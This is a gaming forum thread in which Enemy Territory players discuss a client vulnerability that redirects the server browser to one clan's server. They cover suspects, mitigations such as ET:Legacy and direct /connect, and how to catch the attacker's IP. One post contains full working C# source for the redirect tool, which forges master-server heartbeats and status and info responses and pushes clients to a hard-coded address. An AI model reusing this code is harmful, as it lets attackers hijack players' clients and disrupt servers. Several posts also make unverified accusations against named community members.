Play Online is messed up


(etplayer2008) #1

I used to play ET while back and started playing again. Now when I try to click on play online, it redirects me to some Poliski clan server? I don’t want to play on higher ping servers but it seems like I can’t play on the server i like? Which is DRi in this case.

That’s messed up. What’s going on? Any one seeing same issue? Some sucker have to ruin the game for everyone.


(Nail) #2

you have a rogue pk3 file in etmain, likely starts with zzz, may have obvious Polish name


(ryven) #3

It has nothing to do with pak files, it’s an old exploit that makes you redirect to a target server upon serverlist loading, use ETLegacy to be safe.


(etplayer2008) #4

Nop, I didn’t first but now I got one from that Polish server. I removed all junk pk3’s from my etmain and silent mod folder.

It seems lot’s of server where effected. Crazy morons ruining for everyone.


(etplayer2008) #5

Thank you. Installing it. I didn’t know about ETLegacy.


(Nerwitz) #6

Ai ai, ETL the way to go. Newer version is shaping up to be a major game changer!


(etplayer2008) #7

Looks like I was trying to play on ETPRO and same thing happened. When I followed on SL it seems DRi clan members are doing it. This is BS. I used to like that server for fun sometimes but forcing me to play on their is complete BS. Will play on UJE clan servers going forward.

What happened to ET community? Now forcing players to play on just 1 DRi server? That’s really pathetic.


(Nerwitz) #8

Nobody can know what made them do that. Whatever the excuse, simply having intention for something like this tells whoever did does not care for that game \ever did.

Glad to have you on board with UJE, no fraggers to come please hehe, we don’t like them much. See you on Teamplay if you decide to hang out there.
-nerwitz


(acQu) #9

It is a client issue. I think it was introduced with a new feature they added on 2.6b clients (which is the redirect feature), but 2.55 clients should still be fine.

Your best option is to upgrade to legacy.

Other than that: you can not really proove anything. I mean DRI could even be victim of this. But it seems highly unlikely, as they would benefit so much from this. But the best bet is to not grow hateful on this, since nothing can be prooved.

I guess the only thing you can do to proove is to sniff the ip address of the command, which is sent to your client. Not going to tell more here, but i would know very bad stuff to happen to an obvious abuser.


(ryven) #10

Yeah, it is a client vulnerability, an attacker used to send random ips to redirect last time, not just the one address. I wouldn’t blame here any clan or community.


(Nerwitz) #11

No one should play the blame game on anyone if not having direct evidence. Then say what, whoever does it consciously and deliberately, knowing it is exploiting in every manner possible, is free of blame? Hmm, consequences, hmm… I don’t know anyone that would do that for fun, and is no excuse for your server being empty.


(etplayer2008) #12

Purple aka DRi VJ aka leader of DRi clan was the one who was doing it. He was available on TJ channel. Same ID is available on Trackbase channel and he is the owner of Trackbase channel on Discord. He even posted the screenshot of him showing doing it.

Discord ID’s don’t lie. I don’t believe in Aliases. So for whole weekend when I wanted to play ETPRO, I have to use 2.6b installation only since ETlegacy doesn’t support it.

ETc|Jay also posted screenshots on splatterladder forum. I didn’t know about Trackbase people now I know because when I stopped playing Trackbase didn’t existed. It seems Paul owner of Trackbase even stole code from splatterladder with deception. Now I guess they are all together trying to get hang of master list.

I even noticed servers running ET 3.0 while ET 3.0 violates TOS of source code. I am catching up on my DD (Due Diligence) . Seems like ET community is no more like it was before back in the days.

N3rwitzh - Thanks for the welcome. I am Eng class lover. So I think we might go well together.


(ryven) #13

Calling names and making allegations makes communities to fight each other, it could serve a purpose of the attack.

If you are not playing ET Pro servers, you should just switch using ETLegacy, as there is no proper protection from this, except blacklisting the attackers ip* (which IS NOT the same ip as where you get redirected to), and no one is going to patch mods to prevent this happening, since most of mods’ development is pretty much dead. If you are playing etpro pubs, you can add to favorites all servers you need, then just use favorites tab in the playonline window, or just enter “/ui_netsource 2”. Or you could just use online trackers to find the ips (splatterladder.com, trackbase.net and etc).

*You can catch the attackers ip by setting “/developer 1” in the console before the redirect, after the redirect popup, you can open up the console, skim through the console to find the last “CL packet: ADDRESS”, it will be the one before the ERROR message, then google how to blacklist it in your OS.


(kekmaster) #14

heres the source to the program enjoy dead ass game.

using System;
using System.Net;
using System.Net.Sockets;
using System.Text;

namespace Fdirect
{

public class Program
{
    
    private static void Main(string[] args)
    {
        string s = "ÿÿÿÿheartbeat EnemyTerritory-1";
        string s2 = string.Format("ÿÿÿÿstatusResponse

\omnibot_playing\0\omnibot_enable\1\p\1\voteFlags\1\g_balancedteams\1\g_bluelimbotime\10000\g_redlimbotime\10000\gamename\silent\mod_version\0.9.0\mod_url\0\mod_binary\linux-release\sv_uptime\44d12h22m\sv_cpu\Intel® Xeon® CPU\g_heavyWeaponRestriction\100\g_gametype\2\g_antilag\1\g_voteFlags\0\g_alliedmaxlives\0\g_axismaxlives\0\g_minGameClients\0\g_needpass\0\g_maxlives\0\g_friendlyFire\0\sv_allowAnonymouse\0\sv_floodProtect\1\sv_maxPing\0\sv_minPing\0\sv_maxRate\25000\sv_minguidage\0\sv_punkbuster\0\sv_hostname\^uULTRA FAST ^7- ^6NO LAG ^7- ^2NOT BOTS\mapname\goldrush\protocol\84\ imelimit\30\version\ET 3.00 - TB 0.7.4 linux-i386\sv_maxclients\64
34894 48 “^fFishboi”
“)
string text = string.Format(“ÿÿÿÿinfoResponse
\protocol\84\hostname\^ukekmaster\serverload\0\mapname\goldrush\clients\63\sv_maxclients\64\gametype\4\pure\1\game\silent\sv_allowAnonymous\0\friendlyFire\0\maxlives\0
eedpass\0\punkbuster\0\gamename\et\g_antilag\1\weaprestrict\100\balancedteams\1\challenge”)
string s3 = “ÿÿÿÿprint
“;
string s4 = “ÿÿÿÿchallengeResponse 1234567890”;
string s5 = string.Format(“ÿÿÿÿprint
ET://37.114.96.119:27960”)
byte[] array = new byte[2048];
DateTime now = DateTime.Now;
DateTime value = now;
TimeSpan timeSpan = now.Subtract(value);
Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
IPEndPoint remoteEP = new IPEndPoint(IPAddress.Parse(“192.246.40.60”), 27950);
EndPoint endPoint = new IPEndPoint(IPAddress.Any, 27963);
socket.Bind(endPoint);
socket.SendTo(Encoding.Default.GetBytes(s), remoteEP);
Console.BackgroundColor = ConsoleColor.Black;
Console.ForegroundColor = ConsoleColor.White;
for (; ; )
{
timeSpan = DateTime.Now.Subtract(value);
array = new byte[2048];
int count = socket.ReceiveFrom(array, ref endPoint);
string packet = Encoding.ASCII.GetString(array, 0, count);
if (timeSpan.Minutes >= 5)
{
socket.SendTo(Encoding.Default.GetBytes(s), remoteEP);
Console.WriteLine(“Done”);
value = DateTime.Now;
}
else
{
if (endPoint.ToString().Contains(“192.246.40.60”))
{
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine(“Querying the master server”);
}
if (packet.Contains(“getstatus”))
{
socket.SendTo(Encoding.Default.GetBytes(s2), endPoint);
}
else if (packet.Contains(“getinfo”))
{
string text2 = text;
Console.WriteLine(”{0} -> Saw the redirect server”, endPoint.ToString());
socket.SendTo(Encoding.Default.GetBytes(s5), endPoint);
}
else if (packet.Contains(“getchallenge”))
{
socket.SendTo(Encoding.Default.GetBytes(s4), endPoint);
Console.WriteLine(”{0}: getchallenge", endPoint.ToString());
}
else if (packet.Contains(“connect”))
{
socket.SendTo(Encoding.Default.GetBytes(s5), endPoint);
Console.WriteLine("{0} -> Connected to the server", endPoint.ToString());
}
else if (packet.Contains(“disconnect”))
{
socket.SendTo(Encoding.Default.GetBytes(s3), endPoint);
Console.WriteLine("{0}: disconnect", endPoint.ToString());
}
}
}
}
}
}

https://ghostbin.com/paste/wyzqm


(Nerwitz) #15

[QUOTE=etplayer2008;573888]Seems like ET community is no more like it was before back in the days.

N3rwitzh - Thanks for the welcome. I am Eng class lover. So I think we might go well together.[/QUOTE]

You can use Nerwitz for short, no need to use digits there (check my signature). Sweet thing then, engineer is my class first choice.
Long gone the old school way of doing things. No denying that.


(JoNny) #16

[QUOTE=etplayer2008;573888]Purple aka DRi VJ aka leader of DRi clan was the one who was doing it. He was available on TJ channel. Same ID is available on Trackbase channel and he is the owner of Trackbase channel on Discord. He even posted the screenshot of him showing doing it.

Discord ID’s don’t lie. I don’t believe in Aliases. So for whole weekend when I wanted to play ETPRO, I have to use 2.6b installation only since ETlegacy doesn’t support it.

ETc|Jay also posted screenshots on splatterladder forum. I didn’t know about Trackbase people now I know because when I stopped playing Trackbase didn’t existed. It seems Paul owner of Trackbase even stole code from splatterladder with deception. Now I guess they are all together trying to get hang of master list.

I even noticed servers running ET 3.0 while ET 3.0 violates TOS of source code. I am catching up on my DD (Due Diligence) . Seems like ET community is no more like it was before back in the days.

N3rwitzh - Thanks for the welcome. I am Eng class lover. So I think we might go well together.[/QUOTE]

Hello etplayer2008,

it is true. VJ is behind all of that. Yes, he is a member of DRi. No, he is not the owner of the TrackBase Discord channel. That’s me.
How and why should TB be part of this? We are hosting the ETmaster server. We are basically also one victim of all the lovely players still playing for this game. There are many messages from VJ telling that he’s done it, since he likes to admin things and represent himself as ‘the boss’ who can do those things. Nevermind.
VJ was part of the TrackBase team to help out from time to time. He’s not the owner or even close to that.
He chose the wrong way and got kicked out. TB is strict with that.
Side note: He tried to offer TB ET 3.00 code (which he obviously doesn’t even have) to fellow players after he saw that he got kicked out.
Nevermind that either.
DRi doesn’t seem to kick him out. This kinda shows they don’t care / protect him. Though: It wasn’t the idea of the clan, just VJs. I want to stress that!
I was told it had calmed down lately and the redirects reduced. Maybe some of you can confirm that?

I suggest connecting to servers via /connect directly and playing on one server that you like.
If you want to switch around servers, please use our serverlist and copy+paste the ip:port address to use /connect again.
Other than that: ET:Legacy seems to be a good solution to that if the exploit is being used in the future again.

/JoNny


(acQu) #17

Let us create drama right here, right now, right? Well no. I am in favour of closing this thread. We believe you, Jonny, no harm done.


(etplayer2008) #18

[QUOTE=JoNny;573994]Hello etplayer2008,

Though: It wasn’t the idea of the clan, just VJs. I want to stress that!
I was told it had calmed down lately and the redirects reduced. Maybe some of you can confirm that?

/JoNny[/QUOTE]

Then DRi is pathetic place to be in. I tried to play some ETPRO on HBC and Hirntot servers and every time I started ET, I connected to their pathetic server. His hacking was on full weekend. Tried 3-4 times and each time same thing.

People keep saying use ETLegacy but can’t play on ETPRO with it. I guess, I am going to play my PS4 back till ET community figures out what to do.

Eh, close thread? Every player continuously keep getting redirected to one server and rather then doing something about you are saying close thread? Nice to see people like you.


(KeMoN) #19

There is nothing to figure out. It is a vulnerability inside the gameversion. The community can’t do anything against that.
Even asking SplashDamage for an updated gameversion wouldn’t help, because it would likely have the same compatibility issues like ET: Legacy does.

You can either use ET: Legacy or you can connect through the console with

/connect [server-ip]

.


(macbeth) #20

we been the target yesterday so i am very sorry for the guys who been redirected at ETS , i dont played so much myself but kept to tell to the guys to use ETL

guys if you have a site then please sent a massive email to your site users and tell them to use ETL

but i dont think it is worst than to have a ton of fake servers redirecting on the main server, i can understand to have 1 but not more